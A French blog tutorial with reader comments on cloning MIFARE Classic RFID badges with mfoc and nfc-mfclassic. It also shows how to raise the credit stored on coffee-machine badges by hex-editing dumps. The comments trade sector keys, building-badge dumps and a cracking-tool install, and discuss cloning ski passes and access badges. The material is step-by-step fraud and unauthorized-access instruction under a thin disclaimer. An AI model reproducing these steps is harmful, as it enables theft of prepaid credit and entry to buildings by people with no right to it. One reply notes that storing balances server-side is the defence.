![[Tuto] Copier un badge NFC / RFID (machine à café, badge d’accès bâtiment, etc)](https://i1.wp.com/timetotech.fr/wp-content/uploads/2017/09/801755-1.jpg?resize=1140%2C600&ssl=1)
[Tuto] Copier un badge NFC / RFID (machine à café, badge d’accès bâtiment, etc)
Sans même le savoir, vous l’utilisez tous les jours. Insérer une carte pour démarrer un véhicule, badger pour pointer au travail, badger pour ouvrir une porte, ou pour utiliser une remontée mécanique au ski, valider un titre dans les transports en commun, ou encore badger pour acheter votre café. Tout ces gestes quotidiens utilisent la technologie sans contact RFID pour « Radio Frequency Identification« .
L’origine de la RFID
Pour l’anecdote, la technologie RFID a connu ses premiers jours pendant la 2nd guerre mondiale. Afin d’identifier si les avions qui arrivaient dans l’espace aérien britannique étaient amis ou ennemis, les avions alliés installaient des transpondeurs qui envoyaient des réponses aux radars qui les questionnaient. Le système était appelé IFF « Idendify Friend or Foe ». Aujourd’hui, le trafic aérien reste encore basé sur ce principe.
Cette technologie s’est développée dans les années 70, avec des tags dits « actifs » qui devaient être alimentés comme le lecteur. L’usage était donc restreint à certains domaines tels que le secteur nucléaire, ou militaire. Le véritable prédécesseur du RFID a été breveté en 1973, il concerne l’utilisation de tags dits « passifs » qui reçoivent leur énergie via le lecteur, cela rend le tag beaucoup moins coûteux et plus pratique. À ce moment là on commence à envisager son utilisation dans les banques, la sécurité, le transport, la logistique…
Aujourd’hui, le RFID est utilisé dans de nombreux secteurs, dont le marquage de vêtements qui représente environ 80% du marché des étiquettes passives. IDTechEx prévoit que le marché du RFID pèsera près de 14 milliards de dollars en 2020, 34 milliards d’étiquettes RFID (dont 33 milliards de passives) ont été vendues depuis le début de la RFID, dont 7.5 milliards en 2014, c’est pour dire l’importance du RFID aujourd’hui.
Fonctionnement
Son fonctionnement est assez simple, on utilise des « radio-étiquettes » ou « RFID tag » en anglais, qui sont activés par un transfert d’énergie électromagnétique entre l’étiquette RFID (composé d’une puce et d’une antenne) et le lecteur. Ces lecteurs sont des dispositifs actifs, ils émettent des radiofréquences qui vont activer les étiquettes qui passent devant eux, en leur fournissant de l’énergie. Les étiquettes ont une capacité de 2Kio mais la plupart n’utilisent pas cet espace et ne contiennent d’un ID de 96 ou 128 bits.
Il existe différentes fréquences :
-
- 125 kHz : ils sont d’un poids et d’une taille réduite, ils sont utilisés dans tout type de matériaux comme les textiles, métaux, etc.
-
- 900 MHz : les étiquettes possèdent des antennes imprimées ou gravées, elles peuvent être lus à plusieurs mètres.
-
- 13.56 MHz : la plus répandue dans l’industrie et le grand public pour des applications à portée limitée (badge café, badge porte, etc). Les antennes peuvent être imprimées ou gravées ce qui les rend très fins.
- 2.45 GHz ou 5.8 GHz (micro-ondes) permet des portées de plusieurs mètres, cette fréquence est notamment utilisée pour le télépéage.
Copier un badge
Avant toute chose, sachez que vous êtes responsable de l’utilisation que vous allez faire de cette méthode, ce tutoriel a seulement pour objectif de pointer du doigt le manque de sécurité du RFID, et je ne peux en aucun cas être tenu responsable de vos actes.
Les badges RFID sont construits en 2 parties (sur 64 blocs), une première partie où est stocké l’UID (sur 1 bloc) qui est un identifiant unique du badge, cette partie est normalement non-modifiable, et une seconde partie qui contient les données (sur 63 blocs), qui est elle modifiable. Mais heureusement, on peut trouver sur internet des cartes chinoises qui permettent la modification de l’UID qui est stocké sur le bloc 0.
Pour copier un badge, voici le matériel dont vous aurez besoin :
- Un lecteur de carte RFID qui permet aussi d’écrire, personnellement j’utilise le lecteur ACR122U d’Amazon (vous pouvez aussi commander votre lecteur ACR122U sur Aliexpress un peu moins cher et expédié depuis la France, si vous n’arrivez pas à ouvrir le lien faites Clic Droit sur le lien, puis « Copier l’adresse du lien » et collez le dans un nouvel onglet)
- Des cartes RFID avec le bloc 0 modifiable que vous pouvez trouver ici : Lot de 10 cartes modifiables sur Amazon (ou bien ce lot sur Aliexpress)
Toutes les manipulations que nous allons faire se font sous un système d’exploitation Linux, je vous propose donc de créer une clé USB Kali Linux bootable. Cela va vous permettre d’installer Linux sur une clé USB sans rien changer à votre ordinateur actuel.
[Tuto] Installer Kali Linux sur une clé USB Bootable
Une fois la clé USB prête, redémarrez votre PC en démarrant sur la clé USB (vous pouvez régler cela dans le BIOS).
Lancez ensuite le terminal de commande, branchez votre lecteur RFID, placez votre badge à copier dessus et tapez la commande suivante pour extraire le contenu de la carte :
|
1 |
mfoc -P 500 -O carte-a-copier.dmp |
Ensuite enlevez votre badge, et placez ensuite la carte chinoise sur le lecteur et tapez :
|
1 |
mfoc -P 500 -O carte-chinoise.dmp |
Puis nous allons copier le contenu de la carte sur la carte chinoise :
|
1 |
nfc-mfclassic W a carte-a-copier.dmp carte-chinoise.dmp |
Nous avons normalement réussi à copier 64 des 64 blocs de la carte (pour ceux qui connaissent la commande « nfc-mfsetuid XXXXXXXX » qui était utilisée avant pour modifier l’UID, sachez que maintenant l’UID se change automatiquement lorsque vous utilisez un ‘W’ majuscule dans la commande ci-dessus).
Vérifiez maintenant que votre carte chinoise a le bon UID :
|
1 |
nfc-list |
Vous avez maintenant un clone de votre carte originale.
Modifier le montant d’un badge de machine à café
Je rappel que ce tutoriel a uniquement pour but de montrer les failles de sécurité du RFID, vous êtes donc responsable de l’utilisation que vous allez faire de cette méthode.
Si ce que vous voulez copier est un badge de distributeur, je vais vous montrer ici une faille de sécurité qui permet de modifier le montant stocké en clair sur le badge. Cette astuce fonctionne seulement sur quelques modèles de distributeurs dont je ne citerai pas les marques.
D’abord, vous devez connaître le montant exact que contient votre badge.
Exemple si votre carte contient 9.44€, tapez cette commande pour extraire le contenu :
|
1 |
mfoc -P 500 -O badge944.dmp |
Ensuite il faut que le montant du badge change, vous devez donc soit recharger le badge, soit acheter un produit.
Une fois que le montant a changé, notez le nouveau montant et extrayez à nouveau le contenu, exemple si j’ai un nouveau montant de 9.10€ :
|
1 |
mfoc -P 500 -O badge910.dmp |
Ensuite ouvrez les fichiers avec un éditeur de texte qui gère l’hexadécimal comme « Sublim Text », et comparez les différences entre ces deux fichiers, pour cela je vous conseil de copier le contenu des fichiers sur ce site :
Dans mon exemple, la différence se trouve au niveau de la ligne 51 :
Comme vous pouvez le voir sur la photo, sur le premier fichier « badge944 » on a une valeur en hexadécimal de « 3b0 » qui vaut « 944 » en décimal pour 9.44€, et sur le second fichier « badge 910 » on a une valeur de « 38e » qui vaut « 910 » en décimal, pour 9.10€.
Pour passer de l’hexadécimal au décimal je vous conseil d’utiliser ce convertisseur.
Ainsi il vous suffit de convertir votre montant souhaité (les machines acceptent en général 20€ maximum) en hexadécimal, et de le modifier dans le fichier.
Pour cela vous devez donc extraire le badge original « badge910 » avec 9.10€ dessus, ensuite vous copiez le fichier et le nommez par exemple « badge1999 » pour mettre 19.99€. Dans le fichier « badge1999 » allez à la ligne à modifier (ligne 51 dans mon cas) et modifiez le montant en hexadécimal (je remplace 38E par 7CF pour passer de 9.10€ à 19.99€) puis posez le badge sur le lecteur et vous utilisez la commande suivante pour modifier le montant dans le badge :
|
1 |
nfc-mfclassic W a badge910.dmp badge1999.dmp |
Si vous avez des questions n’hésitez pas à les poster en commentaire.
bonjour
faut t’il un badge vierge ?
Bonjour,
De quel badge parlez-vous ?
bonjour a tous est ce que quelqun peut m envoyer les 2 fichiers Crapto1 et Craptev stp pour reconstruire le programme crypto_bs????
IcoderX@protonmail.ch
salut icoderX.
As tu pu récupérer crapto1 et craptev?
Si oui je suis preneur.
Merci d’avance!!!
zgueneway@hotmail.com
Bonjour pouvez vous creez une badge universel vigilance pour rentrer dans les immeubles.
Bonjour
Super tuto merci.
En ce qui conserne la copie. Ca fonctionne parfaitement.
Mon problème est que mon badge fait office de controle d accès de bâtiment mais aussi accès a la machine a café(je suis technicien donc 0 cafe pour moi. les chef ont le droit au café) . Et je ne sais pas comment trouver la ligne de commande pour modifier l exadeci..
Merci pour ta réponse.
Bonjour Bob,
Je te conseil d’abord de faire un dump de ta carte en connaissant le montant exact qu’il y a dessus, ensuite tu achète quelque chose avec la ta carte en notant le nouveau montant de ta carte, tu refais un dump de la carte avec ce nouveau montant et tu compares tes 2 dumps en essayant de trouver où est la différence,
Cordialement.
Le monsieur t’explique qu’il ne peut rien acheter avec son badge. :-/
Dans ce cas il demande le badge de son patron et fait une copie de son dump et lui re demande un autre jour pour faire la difference des deux. Ensuite voir quel partie correspond aux acces et quel correpond au café.
Bonjour je vien d’acheter le lecteur nfc sur amazone et quand je fait la commande mfoc -500 sur kali Linux ça me mais la ligne de commande non valide pouvez me dire comment faire j’ai fait exactement tout ce qui a était marquer mais ça ne fonctionne pas
Bonjour,
Il faut apprendre à se servir d’un système Linux.
Manifestement les outils ne sont pas installés.
bonjour,
je voulais savoir j’ai reussi a faire un dump de mon vrai badge, sur une carte chinoise et j’ai voulu faire un dump de ma carte chinoise apres avoir pris un ou deux cafés pour comparer le dump du badge d’origine et celui apres utilisation mais quand jessai de dumper ça me met:
Sector: 8, type B, probe 0, distance 64 …..
Sector: 8, type B, probe 1, distance 64 …..
Sector: 8, type B, probe 2, distance 64 …..
Sector: 8, type B, probe 3, distance 64 …..
Sector: 8, type B, probe 4, distance 64 …..
Sector: 8, type B, probe 5, distance 64 …..
Sector: 8, type B, probe 6, distance 64 …..
…
Sector: 8, type B, probe 300, distance 64 …..
sans arret,
alors que le dump de mon vrai badge ce fait tres rapidement avec des distance qui change a chaque ligne:
Sector: 8, type B, probe 0, distance 14971 …..
Sector: 8, type B, probe 1, distance 14923 …..
Sector: 8, type B, probe 2, distance 14968 …..
Found Key: B [415a54454b4d]
Sector: 9, type B
Found Key: B [415a54454b4d]
Sector: 10, type B
Found Key: B [415a54454b4d]
Sector: 11, type B
Found Key: B [415a54454b4d]
Sector: 12, type B
Found Key: B [415a54454b4d]
Sector: 13, type B
Found Key: B [415a54454b4d]
Sector: 14, type B
Found Key: B [415a54454b4d]
Auth with all sectors succeeded, dumping keys to a file!
peux tu me dire pourquoi ?
merci d’avance !
Bonjour,
Malheureusement je ne sais pas d’où vient ce problème… Je te conseil de refaire un dump de ta carte d’origine pour comparer avec le 1er dump d’origine qui avait un montant différent,
Cordialement
utilise
nfc-mfclassic R a dump-cartechinoise.mfd
pour lire ta carte chinoise
pas besoin de connaitre les clefs pour les cartes chinoises qui s’écrivent avec le W, elles ont une backdoor !
Hello,
Concernant la dernière ligne « nfc-mfclassic W a badge910.dmp badge1999.dmp », je pense qu’il faut inverser les 2 derniers paramètres.
–> nfc-mfclassic W a badge910.dmp badge1999.dmp
|_> nfc-mfclassic W a
Bonjour, j’ai un badge qui donne accès pass partout timer si quelqu’un est interesser pour un dump
On dit jamais non à ce genre de chose. Mais qu’est ce qu’un badge timer? ^^
Pass valable 72h, je suis joignable par mail Dany.vsm94@gmail.com
Bonjour,
Je suis intéressé par ce dump, que faut-il faire une fois les 72h passées?
Recharger le badge avec un nouveau dump de 72h
Interresse
Salut, merci pour le tut ! Ça veut dire que si j’ai un forfait de ski, il a un numéro d’attribué, donc si je clone ce forfait et que je le recharge officiellement, tous mes clones fonctionneront au même titre que celui que j’ai officiellement chargé ? Merci
Salut FIFOU,
Ça m’intéresserait d’étudier ton dump.
Moi ausi sela m’intéresserai de l’étudie
Bonjour je serai bien intéressé par le dump svp
Cordialement
Bonjour, je suis intéressé.
bonjour moi je suis intéressé
Salut,
Je suis intéressé par ton dump pass partout timer.
Merci d’avance.
Sela minterese
Bonjour a tous,
Tien tien, salut Fifou .
Alors moi je sui la pour le dump selectruc, j’ai quelque piscine au mois d’aout on va « j’espère » pouvoir teste ca.
J’ai glané sur le net différents dump donnée, un truc qui ne colle pas toujours c’est l’emplacement de la ligne pour le montant, ici ligne 51 qui est aussi ligne 320 avec un hexadecimal, mais sur un autres site il le montre a la ligne 60 « en hexadecimal »
Donc question qu’elle est la bonne ?
Y’a-t-il autres choses de nouveau a savoir, quelque aurait ’il un dump récent, peut ont utilisé un ancien dump ?
Merci de vos réponses
Salut salut,
Alors quelqu’un pour les réponses ?
Merci
Hello Alexi, je te suis depuis NFFR et je souhaite également modifier ma clé rouge selectruc.
Est-ce que tu pourrais partager en PV les différents dumps récoltés ?
J’attend la réception de mon ACR122 pour commencer.
Également un lien parlant d’une nouvelle méthode : http://arishitz.net/coffee-nfc-exploit-coffee-again/
Merci !
Salut Neosp4,
Merci pour ton suivi « je ne suis pas seul »
Je suis comme toi pour l’instant a la recherche d’un dump (un vrai).
Je peut te donner des liens « peut être que tu connait déjà »
https://xorhak.io/manage-d8-selecta-credit-on-your-rfid-card/
https://dyrk.org/2015/09/03/faille-nfc-distributeur-selecta/
https://firefart.at/post/how-to-crack-mifare-classic-cards/
Ensuite avec l’acr122 j’ai deja test mfoc avec une cle selectruc, ca na rien donner « j’aurait du peut etre laisser plus longtemps le scan? »
Quelqu’un d’autres pourrait nous éclairé ?
Merci a vous
Hello Alexi, tu as essayé : libnfc_crypto1_crack avec la méthode décrite sur http://arishitz.net/coffee-nfc-exploit-coffee-again/ en utilisant l’option -k ?
Salut Neosp4,
Non je n’es pas test libnfc_crypto1_crack , je sui avec kali linux bootable (je croie qu’il n’es pas installer par défaut) il me faudrait le lien direct pour l’installer.
Avec : l’option -k , il faut au moins une clé ? j’en n’avait aucune (j’en n’es toujours pas)
La clé selectruc que j’avait , je l’es eu que 20Mn (pas vraiment le temps de test)
Pas de souci pour un rdv avec quelqu’un qui possède un badge selectruc pour diffèrent test (Paris, sud du 14eme)
Bonjour bonjour,
@Neosp4 , je vient de réaliser que tu possède donc une clé rouge comme du dit plus haut.
Peut etre que en mp « sur le site que tu parle ou autres » ca serait bien que ca soit toi qui m’envoie ton dump, car je pense avoir comprit le truc, mais sans dump « ou badge » effectivement pas de test !
https://translate.googleusercontent.com/translate_c?depth=1&hl=fr&prev=search&rurl=translate.google.fr&sl=en&sp=nmt4&u=https://www.nxp.com/docs/en/data-sheet/MF1S50YYX_V1.pdf&usg=ALkJrhhvK8XXq5GxD_XOXxlfYIY2Mfc9BQ
Bonjour à tous,
Alexi, pour répondre à ta question, le montant n’est pas toujours situé au même endroit selon les clés/cartes. Le plus simple, comme indiqué plus haut, est de faire un dump, ensuite d’acheter quelque chose avec ta carte et refaire un dump. En comparant les deux, tu sauras où est situé ce fameux montant (inscrit sur 2 octets)
Il faut également savoir que l’attaque mfoc ne fonctionne plus sur les cartes/clés fabriquées à partir de 2013(peut être 2012 mais pas avant), c’est en tout cas ce que j’ai constaté sur les tests effectués.
Donc seule l’attaque avec crypto1_crack fonctionne à partir de cette date.
Encore une chose à savoir, chaque carte/clé possède un ‘code site’ (3 octets) qui permet de limiter l’utilisation à un endroit, cela évite d’avoir une carte/clé passe partout.
Sur les tests que j’ai effectués, ce ‘code site’ est situé juste après le montant, séparé par un octet.
Le même dump peut donc être utilisé à plusieurs endroits à condition de modifier ce ‘code site’.
J’espère que ça apportera quelques réponses
Bonjour tout l’monde,
Merci Alpha pour ces précisions qui font avancer le schmilblick !
Bonjours quelqu’un pourrait m’envoyer un dump d’un badge selecta ?
Dump effectué à partir d’une carte selectruc :
http://www.k-upload.fr/afficher-fichier-2018-08-26-1223fb981dumpselectru.mfd.html
Bonjour quelqu’un pourrait m’envoyer un dump d’un badge selecta ?
Bjr
J’ai une clé cafe luxeo cela fait des mois que je me sers de mct pour recharger cela fonctionner. Depuis mercredi impossible de la recharger (elle fonctionne toujours) ils ont changé une machine sur les 5 elle est tactile celle ci. Quand je veux refaire depuis le début la manipulation sur mct je m’aperçois que les secteurs de 8 à 14 sont vide quelques peut il m’aider? Je le fait de mon téléphone.
Merci
Bjr
J’ai une clé cafe luxeo cela fait des mois que je me sers de mct pour recharger cela fonctionner. Depuis mercredi impossible de la recharger (elle fonctionne toujours) ils ont changé une machine sur les 5 elle est tactile celle ci. Quand je veux refaire depuis le début la manipulation sur mct je m’aperçois que les secteurs de 8 à 14 sont vide quelques peut il m’aider? Je le fait de mon téléphone.
Merci
Bonjour tous le monde, Mon badge est utiliser pour ( » Pointer ses heures de travail » / » Distributeur » / » payer la cantine » ) est t-il possible d’effectuer la méthode ?
Si oui, cela ne va pas posé problème au niveau du pointage d’heure et de la cantine ?
Ou sinon, ( Je ne m’y connais pas trop ) serrai t-il possible de copier un dump d’un badge select.. sur un badge vierge pour être tranquille ?
Bonjour Chris,
La première chose à faire est de savoir quelle technologie est utilisée par ton badge, la méthode indiquée ici ne concerne que les mifare classic.
Si c’est effectivement le cas, il faut voir à quoi ressemble le dump de ton badge, et repérer les octets qui nous intéressent.
dans mon entreprise ce sont de vieille machine a café etc..
il semblerai qu’ils s’agisse RFID Mif 1K 13.56Mhz
Bonjour Chris,
S’il s’agit effectivement d’une mifare classic, cette méthode peut s’appliquer, maintenant tout dépend de quand date ton badge, si cette méthode ne fonctionne pas, il faudra utiliser crypto1_crack.
Concernant le pointage et la cantine, cela ne devrait pas poser de problème (à mon avis). Comme toujours, le mieux serait de faire un dump avant toute modification, ensuite de pointer et de refaire un dump pour voir si une modification est faite, idem pour le café.
Bonsoir, pouvez-vous m’apporter votre aide, lorsque je lance la commande mfoc -P 500 -O carte-a-copier.dmp
j’obtiens des UNKNOWN_KEY partout et enfin ça affiche » No sector encrypted with the default key has been found, exiting.. « .
Savez-vous comment je peux faire ?
Les clefs de chiffrage manquantes de mon tag café selecta rouge U-key étaient :
3df765ee58b3
3a049ea08f4d
347ed1324289
Essayez : en mettant les clefs dans un fichier keysfile.txt puis :
mfoc -O dump.dmp -F keysfile.txt
Peut-être que ce sera les mêmes..
Sinon pour cracker les cléfs manquantes, utilisez dans miLazycracker l’outil libnfc_crypto1_crack :
git clone https://github.com/Neiluj9/miLazyCracker
cd miLazyCracker
./miLazyCrackerFreshInstall.sh
(je l’ai forké car Crapto1 et CraptEV1 sont down sur le git original)
Pour l’anecdote, pareil, je n’arrivais pas à trouver les clefs de chiffrage (A et B) de mon badge d’accès d’immeuble vert NORALSY, et ça se trouve rapidement sur le net. Pour le coup c’était quelque chose comme BARON et AARON à convertir en hex. Soit NORA en verlan avec B et A à la fin
Bonsoir, Comment as-tu forcer l’installation du milazycracker car j’ai les fichiers Crapto1 et Craptev et je n’arrive pas à installer.
bonjour thelon peux tu m envoyer les 2 fichiers Crapto1 et Craptev stp
IcoderX@protonmail.ch
@NEILUJ9
J4ai eu le même problème que toi. JE n’arrive pas à forker Crapto1 et CraptEV1. Comment as-tu fais?
c’est BLARON et ALARON en hexa normalement pour les NORALSY
Bonjour est ce que c’est possible de me donner le mode opératoire pour cloner u badge avec milazycracker ? En effet avec mcuk et mfoc ça ne fonctionne pas.
Merci
Je suis preneur aussi 🙂
Bonjour j’aimerais bien savoir avec quel lecteur je pourrais lire une clé à café coges merci
Bonjour,
Je ne connais pas ce type de clé à café, mais le lecteur RFID le plus évolué aujourd’hui est le « Kit Proxmark 3 » mais son tarif varie entre 150 et 300€ en fonction des versions,
Cordialement.
bonjour, alors moi y a pas que 2 chiffres de changé mais tout une panopli.
une idée?
salut
je n arrive pas a faire le dump de la carte. Il y a 16 keys non trouvees: 01 a 08 A et B
Voila ce que ca me donne:
https://i.postimg.cc/SQHDCzYk/Key-Card.png
Apres, ca ne trouve aucune cle, ca tourne pendant des heures sans resultat.
Merci de me venir en aide
@+
Bonjour,
Je suis un peu dans le même cas que le commentaire précédent.
Il me manque des clefs sur certain block.
J ai essayé mfoc mfcuk milazycracker… Mais rien..
Est ce possible ?
C est une carte de restauration qui décompte des repas et pas du café.
Cordialement
Bonjour à tous,
Je viens de me mettre au RFID et j’ai pour l’instant réussi tout ce que j’ai voulu faire (clone de badge VIGIK, clone de clef café…) mais à la touche finale lorsque je veux tester de rajouter du crédit ça ne fonctionne pas.
Le fichier de dump que j’ai modifié en hexa pour un montant de 13.37€ est correct, ma commande « nfc-mfclassic W a ./test/badge098.dmp test_leet.dmp » s’effectue correctement sans erreurs et me prompt bien « Done, 64 of 64 blocks written. ». Or quand je passe ma clef devant le lecteur, je n’ai que les 0.98€ présents avant le dump… Des idées? 🙂
Bonjour, est il possible juste copié badge avec un grande somme sur badge virge avec block 0 modifiable?
Oui c’est possible…
fonctionne pas
Hello !
Quelqu’un a déjà essayé de cloner un forfait de ski ?
Ça m’intéresserai beaucoup d’acheter 1 forfait journée et de le dupliquer pour toute la famille 🙂
Bonjour,
Dans la théorie je pense que c’est possible,
Mais je ne sais pas si les stations acceptent un badge plusieurs fois d’affilé, c’est à dire que si vous êtes 3 à utiliser le même badge, je doute que les portes de la station de ski s’ouvre 3 fois d’affilé avec le même forfait,
C’est à tester,
Cordialement.
Bonjour quand je clone le badge , cela marque: CARD IS NOT VULNÉRABLE TO NESTED ATTACK. avez vous une idee pour contourner ce problème merci
bonjour quelle est le type de badge que tu souhaite dupliquer ?
Bonjour, je n’ai malheureusement pas ce lecteur RFID mais je possède le lecteur RFID-RC522, il faut donc que je le connecte à mon arduino il n’a pas d’usb, peut-on quand même faire la manipulation mais avec un arduino en intermédiaire ? merci
Bonjour,
Je n’ai aucune idée du fonctionnement d’une arduino malheureusement…
Cordialement
Bonsoir,
Merci pour ce tuto et les explications !
je voudrais savoir comment cloner ma carte d’abonnement qui me donne accès à la salle de sport. Cette carte a une sorte de bande magnétique sur le bas. Je ne sais ps si c’est Le même procédé que les cartes « standards ». Lorsque je rentre à la salle de sport, je dois juste passer la carte sur un lecteur de badge. Pas besoin de la faire glissser ou quoi que ce soit. Je me dis que ça doit probablement être la même chose.
Seoconde question, comment je peux modifier les donnes de la cartes ?
J’ai commandé l’appareil pour la lecture et l’écriture Des lectures. Mais je souhaite me renseigner quand même.
Quelqu’un peux m’aider ?
Bonjour zulic,
Tout d’abord, il faut savoir que les technologies sans contact sont diverses et variées donc difficile de savoir si la carte que tu utilises est une mifare classic. Vu que tu as commandé un lecteur, tu seras fixé !
Concernant la modification des données, tu auras besoin d’un éditeur hexadécimal pour effectuer cette opération.
Tout dabord bonne Annee à tous
J ai un ordi sous Windows 7 intégrale j ai créé un USB bootable avec Linux kali
J ai booster sur la clé usb
J ai ouvert kali graphique mais ne sais comment faire détecter mon lecteur le même que le tien acheté sur Amazon on me demande CD langue ou CD ? je ne peux rien faire ne sais pas help please
Bisous
Bonjour,
Normalement sous Kali le lecteur est automatiquement reconnu, il faut aller dans un TERMINAL et entrer les commandes mentionnées dans le tuto,
Cordialement
Bonjour,
Après avoir perdu et cassé plusieurs badges, je voudrais savoir s’il est possible de cloner mon badge d’immeube sous forme de sticker RFID à coller derrière mon portable par exemple pour ne plus le perdre ? Si oui pouvez vous m’indiquer ou est ce que je pourrai me procurer un sticker pour copie comme celui là ?
Bonjour swift, c’est effectivement possible de copier une carte sur un sticker, la technologie reste la même.
Tu peux trouver ça sur eBay par exemple.
Mais avant ça, tu devrais commencer par faire un dump de ton badge existant.
merci alpha tu as raison. Le dump fonctionne et j’ai pu trouvé des stickers comme celui là ici :
https://www.amazon.fr/Sticker-MIFARE-Classic-Anti-Metal-protection/dp/B07DBS9QFB/ref=sr_1_6?ie=UTF8&qid=1546977501&sr=8-6&keywords=uid+modifiable
merci encore
Bonjour,
Voici le type de carte que je procède.
http://www.ewcg.eu/Angelova/Axess-Catalogues-www/Smart_Card_TRW_STRIPE_ds_v9_en.pdf
Ma carte me sert pour mon abonnement à la salle de sport. Je voudrais savoir s’il serait possible de copier la carte et de modifier les paramètres sur une autre carte. Pour résumer, si je peux modifier la date de l’abonnement.
Quelqu’un peu m’aider ?
Bonjour,
Ce n’est pas possible car je pense que la date de l’abonnement est stockée dans les serveurs de la salle de sport et non en brut sur ta carte,
Cordialement.
Bonjour ma question était on télécharger et quoi télécharger pur badge chinois et carte rfid pout lecteur nfc de chez Amazon comment mettre ces fichier sur Linux unbitu ou kali je télécharge depuis Windows et les Intallent sur Linux kali ou autre ou alors comment faire ?
Questions pour 1 champion
Bonne annee
Bisous sandrine
Svp lisez répondez si pas bon groupe
Bonjour,
novice en rfid et juste pour le fun,
Est il possible de cloner ou modifier un badge aztek de machine à café ?
Un NFC tools sur android me donne ces infos :
type de tag : Iso 14443-3a
nxp mifare ultralight
Techno dispo : nfcA
atqa : 0x004
SaK : 0x00
Quel badge et quel lecteur utiliser svp ?
merci
Bonjour,
Je ne connais pas ces badges aztek donc je ne pourrais pas vous aider,
Cordialement
Bonjour, oui c’est possible. Mais impossible de changer le montant. Je vous conseilles donc de recharger votre badge au montant max, de faire un dump, puis de réinjecter le dump autant de fois que vous voulez.
Pour la copie un simple mfoc ne fonctionne pas sauf si vous avez connaissance d’une des clef. Un simple mfcuk fera l’affaire 🙂 une fois la clef trouver : mfoc -k lacleftrouve -O nomdubadge.dmp.
Bien cordialement.
Bonjour, je vient vers vous cars je ne trouve pas de solution et pourtent j’en n’ai essayer plain
J’ai le meme badge que xkyze
Un aztek badge gris mifare ultralight nxp Iso 14443-3a
Techno dispo : nfcA
atqa : 0x004
SaK : 0x00
Jutilise le acr122u sous kali linux a la derniere version dispo a ce jour
Mon probleme et que je badge et bien recconue je voie le uid mais des que je fait le dump avec mfoc ou mfcuk sa ne fonctionne pas mfoc me dit quil prend que les mifare classic et mfcuk ce mais en erreur comme si il pouvais pas decoder le badge du coup je sais pas quoi faire ou quel programme utiliser
Svp jai besoin de vous pour une solution si possible ou si une personne a un dump je prend aussi 🙂 sa serrai super gentil merci d’avance
bonjour je connais les badges aztek si vous souhaitez des infos n’hesitez pas!!
Slt hornet peut-tu me donner des infos sur les badges aztek ?
Merci
Bonjour hornet,j aurais besoin d info sur les badge aztek, pour faire un dump.merci
Bonjour Jerem,
Sais-tu comment décrypté un dump en hexa d’un badge aztek ?
Hello je suis aussi intéressé, Merci pour ta réponse…
Bonjour,
Hornet je suis également Intéressé si tu as des infos sur les badges AZTEK.
J’ai reussi a dump le mien et j’ai remarqué certainne chose intéressante mais au final je bloque…
Merci d’avance
Bonjour, Merci pour cet article. Je viens de faire le test dans mon entreprise et j’aimerais savoir. Y a-t-il un moyen de se protéger contre ce type de pratique en appliquant un correctif ou a-t-on besoin de changer tous les badges?
Merci!
Bonjour,
Le problème ne vient pas des badges, il vient surtout des machines qui stockent le montant dans les badges, il faudrait que les machines stockent elles même le montant, que le badge ne serve que d’identifiant et que les machines soient toutes connectées en réseau pour avoir la même base de donnée,
Cordialement.
Bonjour,
Article très intéressant.
Mais je me pose une question ( entre clonage et modification) sur un badge de café par exemple ou justement il y a une somme .
Si on clone ce badge sur un autre badge, y aura t’il donc le même montant ?
Merci par avance .
Bonjour,
Si vous clonez un badge, c’est une copie conforme donc si le montant est stocké sur la badge alors vous aurez exactement le même montant sur le nouveau badge,
Cordialement.
Merci
bonjour,
peut on cloner un tag master passive rfid collé au pare brise pour ouvrir une barriere avec cette methode?
merci
Bonjour,
Il y a énormément de différences entre les les 2 dumps.
Y a t’il un moyen de savoir (autre que visuel) quel bytes sont les donnés qui contiennent le soldes?
Merci
Bonjour,
À part comparer le code des 2 dumps visuellement je ne vois pas d’autre solution…
Sauf peut être connaitre le solde exact de la clé, le convertir en hexadécimal et le rechercher dans le code mais c’est peut probable que vous pussiez le trouver comme ça car le montant en hexa est peut-être séparé par des espaces,
Cordialement
Bonjour,
Je voudrais savoir ou trouver le code site sur un dump et si une liste de code site existait ?
merci.
Bonjour,
Qu’entendez vous par « code site » ?
Cordialement
Bonjour,
Tout d’abord merci pour l’article rien à dire très explicite.
Je viens de telecharger le linux et ma question va paraitre bête mais comment acceder au terminal de commande ? Ensuite les lignes de commandes sont en francais dans votre exemple mais mon linux est en anglais cela a t-il un impact?
Merci pour vos réponse !
Bonjour,
Pour ouvrir le terminal de commande il faut que vous vous rendiez dans le menu des applications en haut à gauche, et ouvrir « Terminal »,
Les commandes sont en anglais, c’est juste le nom des fichiers qui est en français donc cela n’a aucune importante que votre linux soit en anglais,
Cordialement.
Bonjour quand je veux réinjecter le dmp clone ou modifié cela me met unlock failure
Quelqu’un a une idée?
Cela signifie que le badge vierge ne possède pas de bloc 0 rDéinscriptible (vous ne pourrez donc pas cloner l’identifiant de votre badge d’origine).
Bonjour à tous j’ai un petit problème j’arrive à lire un badge pour machine à café mais il ne trouve pas le bloc 10 à 14 comment les trouver et cloné ce badge, je suis sur kali Linux merci pour vos réponses
bonjour, j’ai un peu le meme probleme …. j’ai réussi à dumper la clé a café en crackant la clé B qui manquait avec miLazyCracker… mais je n’arrive pas à copier toutes les données récupérées dans la nouvelle clé : les lignes 33 à 48 ne sont pas clonées sur les 64 lignes ?!?
Bonjour, je vient vers vous cars je ne trouve pas de solution et pourtent j’en n’ai essayer plain
J’ai le meme badge que xkyze
Un aztek badge gris mifare ultralight nxp Iso 14443-3a
Techno dispo : nfcA
atqa : 0x004
SaK : 0x00
Jutilise le acr122u sous kali linux a la derniere version dispo a ce jour
Mon probleme et que je badge et bien recconue je voie le uid mais des que je fait le dump avec mfoc ou mfcuk sa ne fonctionne pas mfoc me dit quil prend que les mifare classic et mfcuk ce mais en erreur comme si il pouvais pas decoder le badge du coup je sais pas quoi faire ou quel programme utiliser
Svp jai besoin de vous pour une solution si possible ou si une personne a un dump je prend aussi 🙂 sa serrai super gentil merci d’avance
Bonjour Mr massa,
La commande mfoc ne sert que pour les mifare classic, le badge que tu as est un Ultralight.
Pour pouvoir le lire, il faut utiliser la ligne de commande :
nfc-mfultralight r Dump.mfd
Pour info, il n’y a pas de clé cryptée par défaut sur les Ultralight mais une protection de type 3DES qui n’est pas active par défaut.
merci beaucoup de ta réponse rapide du coup si j’ai bien compris de se que tu ma dit et de se que je lie sur ce site
https://air.imag.fr/index.php/ACS_ACR_122
j’ai juste a taper la commande nfc-mfultralight r Dump.mfd pour avoir un dump du badge ?
part contre pour modifier que l’argent sur le badge comment je fait ? comme sa c’est plus discret si je garde le même badge tu c’est comment on fait ou il y a que le dump pour cela ?
